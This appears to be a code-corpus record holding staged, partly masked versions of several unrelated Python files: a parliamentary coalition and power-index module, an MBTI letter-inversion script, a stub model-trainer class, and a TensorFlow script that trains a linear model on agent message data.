other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-3": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n 
self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-4": "<mask token>\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < 
other.seats\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-5": "import collections\nimport itertools\nfrom . 
import stats\n\n__all__ = [\n 'Party',\n 'HoR',\n 'Coalition'\n]\n\nParty = collections.namedtuple('Party', 'name,votes,seats')\n\n\nclass HoR(object):\n \"\"\"House of Representatives\"\"\"\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [vi / v for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [si / s for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n\n haar = stats.haar\n dev = stats.dev\n ens = stats.ens\n env = stats.env\n rrp = stats.rrp\n bantsaf_influence = stats.bantsaf_influence\n shepli_shubic = stats.shepli_shubic\n jonson_general = stats.jonson_general\n jonson_influence = stats.jonson_influence\n digen_pakel_general = stats.digen_pakel_general\n digen_pakel_influence = stats.digen_pakel_influence\n holer_pakel = stats.holer_pakel\n describe = stats.describe\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat)\n for party in self._parties}\n elif stat in (\n stats.bantsaf_influence,\n stats.shepli_shubic,\n stats.jonson_general,\n stats.jonson_influence,\n stats.digen_pakel_general,\n stats.digen_pakel_influence,\n stats.holer_pakel,\n ):\n return {party.name: stat(self, party)\n for party in self._parties}\n elif stat not in (\n 'bantsaf_influence',\n 'shepli_shubic',\n 'jonson_general',\n 'jonson_influence',\n 'digen_pakel_general',\n 'digen_pakel_influence',\n 'holer_pakel',\n ):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party)\n for party in self._parties}\n\n\nclass Coalition(HoR):\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return 
self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other, )\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return (\n (self > opposition)\n and\n ((self - party) <= (opposition + party))\n )\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n\n", "step-ids": [ 31, 32, 34, 36, 39 ] }
[ 31, 32, 34, 36, 39 ]
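A minimal usage sketch for the coalition classes in the record above; the import path is hypothetical and the seat/vote figures are made up for illustration:

from hor import Party, HoR  # hypothetical import path for the module above

parties = [
    Party(name='A', votes=4_200_000, seats=48),
    Party(name='B', votes=3_900_000, seats=41),
    Party(name='C', votes=1_100_000, seats=11),
]
house = HoR(parties)
ruling = house.top(2)                        # coalition of the two largest parties
print(ruling.seats, ruling.opposition.seats) # 89 11
print(ruling.key_parties())                  # A and B: removing either flips the majority
print(ruling.is_minimum_winning())           # True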
# https://www.acmicpc.net/problem/20540

# Dictionary mapping each MBTI indicator to its opposite
MBTI_reverse_index = {
    'E': 'I',
    'I': 'E',
    'S': 'N',
    'N': 'S',
    'T': 'F',
    'F': 'T',
    'J': 'P',
    'P': 'J'
}

# Read Yeongil's four-letter MBTI type in uppercase
yeongil_MBTI = input()

# Print the opposite of each indicator in Yeongil's MBTI
for i in yeongil_MBTI:
    print(MBTI_reverse_index[i], end='')
normal
{ "blob_id": "c247b218267fc7c2bee93053dd90b2806572eaf2", "index": 4234, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n", "step-3": "MBTI_reverse_index = {'E': 'I', 'I': 'E', 'S': 'N', 'N': 'S', 'T': 'F', 'F':\n 'T', 'J': 'P', 'P': 'J'}\nyeongil_MBTI = input()\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')\n", "step-4": "# https://www.acmicpc.net/problem/20540\n\n# 각 지표의 반대되는 지표를 저장한 dictionary\nMBTI_reverse_index = {\n 'E': 'I',\n 'I': 'E',\n 'S': 'N',\n 'N': 'S',\n 'T': 'F',\n 'F': 'T',\n 'J': 'P',\n 'P': 'J'\n}\n\n# 연길이의 MBTI 4글자를 대문자로 입력\nyeongil_MBTI = input()\n\n# 연길이 MBTI의 각 지표에 반대되는 지표를 출력\nfor i in yeongil_MBTI:\n print(MBTI_reverse_index[i], end='')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
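For example, the input ENFP prints ISTJ, since each axis letter is replaced by its complement.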
#
# o o
# 8 8
# .oPYo. .oPYo. odYo. o8P o8 .oPYo. odYo. .oPYo. .oPYo.
# Yb.. 8oooo8 8' `8 8 8 8oooo8 8' `8 8 ' 8oooo8
# 'Yb. 8. 8 8 8 8 8. 8 8 8 . 8.
# `YooP' `Yooo' 8 8 8 8 `Yooo' 8 8 `YooP' `Yooo'
# :.....::.....:..::..::..::..:.....:..::..:.....::.....:
# :::::::::::::::::::::::::::::::::::::::::::::::::::::::
# :::::::::::::::::::::::::::::::::::::::::::::::::::::::
#
# Copyright Yazan Obeidi, 2017
#
# python.learning.learn - single interface for learning
#

from src.python.utils.log import init_log
from src.python.utils.config import init_config
from src.python.learning.models import Model

__author__ = 'yazan'
__version__ = '0.0.1'
__licence__ = 'Apache V2'

class Trainer(object):
    """Consumes data/dataset in streamable or batch format
    and trains a single model in the available catalogue.
    """
    def __init__(self, log, config, model_handle, model_schema):
        """:params:
            model_handle: a model object, i.e. a RandomForest clf handler
            model_schema: reference to the library for that model, i.e. sklearn
        """
        self.log = log
        self.config = config
        self.model = model_handle
        self.schema = model_schema

    def train(self):
        pass

    @property
    def score(self):
        pass


if __name__ == '__main__':
    log = init_log()
    config = init_config()
    # model_handle and model_schema are required parameters;
    # None placeholders keep this entry point runnable until a real model is wired in
    trainer = Trainer(log=log, config=config,
                      model_handle=None, model_schema=None)
normal
{ "blob_id": "c6357e6e0656388fc3fd849879aa6000e0bee1ee", "index": 1553, "step-1": "#\n# o o \n# 8 \n# .oPYo. .oPYo. odYo. o8P o8 .oPYo. odYo. .oPYo. .oPYo. \n# Yb.. 8oooo8 8' `8 8 8 8oooo8 8' `8 8 ' 8oooo8 \n# 'Yb. 8. 8 8 8 8 8. 8 8 8 . 8. \n# `YooP' `Yooo' 8 8 8 8 `Yooo' 8 8 `YooP' `Yooo' \n# :.....::.....:..::..::..::..:.....:..::..:.....::.....:\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::\n#\n# Copyright Yazan Obeidi, 2017\n#\n# python.learning.learn - single interface for learning\n#\n\nfrom src.python.utils.log import init_log\nfrom src.python.utils.config import init_config\nfrom src.python.learning.models import Model\n\n__author__ = 'yazan'\n__version__ = '0.0.1'\n__licence__ = 'Apache V2'\n\nclass Trainer(object):\n \"\"\"Consumes data/dataset in streamable or batch format\n and trains a single model in the available catalogue.\n \"\"\"\n def __init__(self, log, config, model_handle, model_schema):\n \"\"\":params:\n model_handle: a model object, i.e. a RandomForest clf handler\n model_schema: reference to the library for that model, i.e. sklearn\n \"\"\"\n self.log = log\n self.config = config\n self.model = model_handle\n self.schema = model_schema\n\n def train(self):\n pass\n\n @property\n def score(self):\n pass\n\n\nif __name__ = '__main__':\n log = init_log()\n config = init_config()\n trainer = Trainer(log=log, config=config)", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
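A hedged instantiation sketch following the docstring's sklearn example; the RandomForestClassifier choice is illustrative only, and init_log/init_config are assumed importable as in the module above:

import sklearn
from sklearn.ensemble import RandomForestClassifier

log = init_log()
config = init_config()
trainer = Trainer(log=log, config=config,
                  model_handle=RandomForestClassifier(),
                  model_schema=sklearn)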
import tensorflow as tf import csv from tensorflow.keras import layers from tensorflow.keras.layers.experimental import preprocessing import pandas as pd import numpy as np import random import matplotlib.pyplot as plt import math def plot_loss(history): plt.plot(history.history['loss'], label='loss') plt.plot(history.history['val_loss'], label='val_loss') plt.ylim([0, 10]) plt.xlabel('Epoch') plt.ylabel('Error') plt.legend() plt.grid(True) #get data outputs=[] inputs=[] with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\actions.csv',newline='') as csvfile: reader=csv.reader(csvfile,dialect='excel') for x in reader: outputs.append(x) with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\messages_3_2.csv',newline='') as csvfile: reader=csv.reader(csvfile,dialect='excel') for x in reader: inputs.append(x) dataset=[[inputs[x],outputs[x]] for x in range(len(inputs))] del dataset[8500:] #process data length=int(len(dataset)*0.8) train_dataset=random.sample(dataset,length) test_dataset=[y for y in dataset if y not in train_dataset] train_features=[x[0] for x in train_dataset] train_labels=[x[1] for x in train_dataset] test_features=[x[0] for x in test_dataset] test_labels=[x[1] for x in test_dataset] for x in range(len(train_features)): train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0)) train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0)) train_features=np.array(train_features) train_labels=np.array(train_labels) for x in range(len(test_features)): test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0)) test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0)) test_features=np.array(test_features) test_labels=np.array(test_labels) #make model #message=tf.keras.Input(shape=(1,100)) #predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message) #linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer) normalizer=preprocessing.Normalization(input_shape=(1, 100)) normalizer.adapt(train_features) linear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)]) linear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error') #train model history = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2) plot_loss(history) #test model test_results = linear_model.evaluate(test_features, test_labels, verbose=1) print("agent 3-2 post train error="+str(test_results)) linear_model.save('agent3-2.h5')
normal
{ "blob_id": "196147d7b2b0cf7176b5baa50d7e7618f88df493", "index": 7911, "step-1": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\n<mask token>\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\n<mask token>\ndel dataset[8500:]\n<mask token>\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\n<mask token>\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], axis=0))\n<mask token>\nnormalizer.adapt(train_features)\n<mask token>\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\n<mask token>\nplot_loss(history)\n<mask token>\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-3": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\noutputs = []\ninputs = []\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\ndataset = [[inputs[x], outputs[x]] for x in range(len(inputs))]\ndel dataset[8500:]\nlength = int(len(dataset) * 0.8)\ntrain_dataset = random.sample(dataset, length)\ntest_dataset = [y for y in dataset if y not in train_dataset]\ntrain_features = [x[0] for x in train_dataset]\ntrain_labels = [x[1] for x in train_dataset]\ntest_features = [x[0] for x in test_dataset]\ntest_labels = [x[1] for x in test_dataset]\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\ntrain_features = np.array(train_features)\ntrain_labels = np.array(train_labels)\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], 
axis=0))\ntest_features = np.array(test_features)\ntest_labels = np.array(test_labels)\nnormalizer = preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model = tf.keras.Sequential([normalizer, tf.keras.layers.Dense(6)])\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,\n verbose=0, validation_split=0.2)\nplot_loss(history)\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-4": "import tensorflow as tf\nimport csv\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport math\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\noutputs = []\ninputs = []\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\ndataset = [[inputs[x], outputs[x]] for x in range(len(inputs))]\ndel dataset[8500:]\nlength = int(len(dataset) * 0.8)\ntrain_dataset = random.sample(dataset, length)\ntest_dataset = [y for y in dataset if y not in train_dataset]\ntrain_features = [x[0] for x in train_dataset]\ntrain_labels = [x[1] for x in train_dataset]\ntest_features = [x[0] for x in test_dataset]\ntest_labels = [x[1] for x in test_dataset]\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\ntrain_features = np.array(train_features)\ntrain_labels = np.array(train_labels)\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], axis=0))\ntest_features = np.array(test_features)\ntest_labels = np.array(test_labels)\nnormalizer = preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model = tf.keras.Sequential([normalizer, tf.keras.layers.Dense(6)])\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,\n verbose=0, validation_split=0.2)\nplot_loss(history)\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-5": "import tensorflow as tf\nimport csv\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport math\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n 
plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n#get data\n\noutputs=[]\ninputs=[]\n\nwith open('C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',newline='') as csvfile:\n reader=csv.reader(csvfile,dialect='excel')\n for x in reader:\n outputs.append(x)\n\nwith open('C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv',newline='') as csvfile:\n reader=csv.reader(csvfile,dialect='excel')\n for x in reader:\n inputs.append(x)\n\ndataset=[[inputs[x],outputs[x]] for x in range(len(inputs))]\n\ndel dataset[8500:]\n\n#process data\n\nlength=int(len(dataset)*0.8)\ntrain_dataset=random.sample(dataset,length)\ntest_dataset=[y for y in dataset if y not in train_dataset]\n\ntrain_features=[x[0] for x in train_dataset]\ntrain_labels=[x[1] for x in train_dataset]\n\ntest_features=[x[0] for x in test_dataset]\ntest_labels=[x[1] for x in test_dataset]\n\nfor x in range(len(train_features)):\n train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0))\n train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0))\n\ntrain_features=np.array(train_features)\ntrain_labels=np.array(train_labels)\n\nfor x in range(len(test_features)):\n test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0))\n test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0))\n\ntest_features=np.array(test_features)\ntest_labels=np.array(test_labels)\n\n#make model\n\n#message=tf.keras.Input(shape=(1,100))\n#predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message)\n#linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer)\n\nnormalizer=preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)])\n\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error')\n\n#train model\n\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2)\n\nplot_loss(history)\n\n#test model\n\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\n\n\nprint(\"agent 3-2 post train error=\"+str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-ids": [ 1, 2, 3, 4, 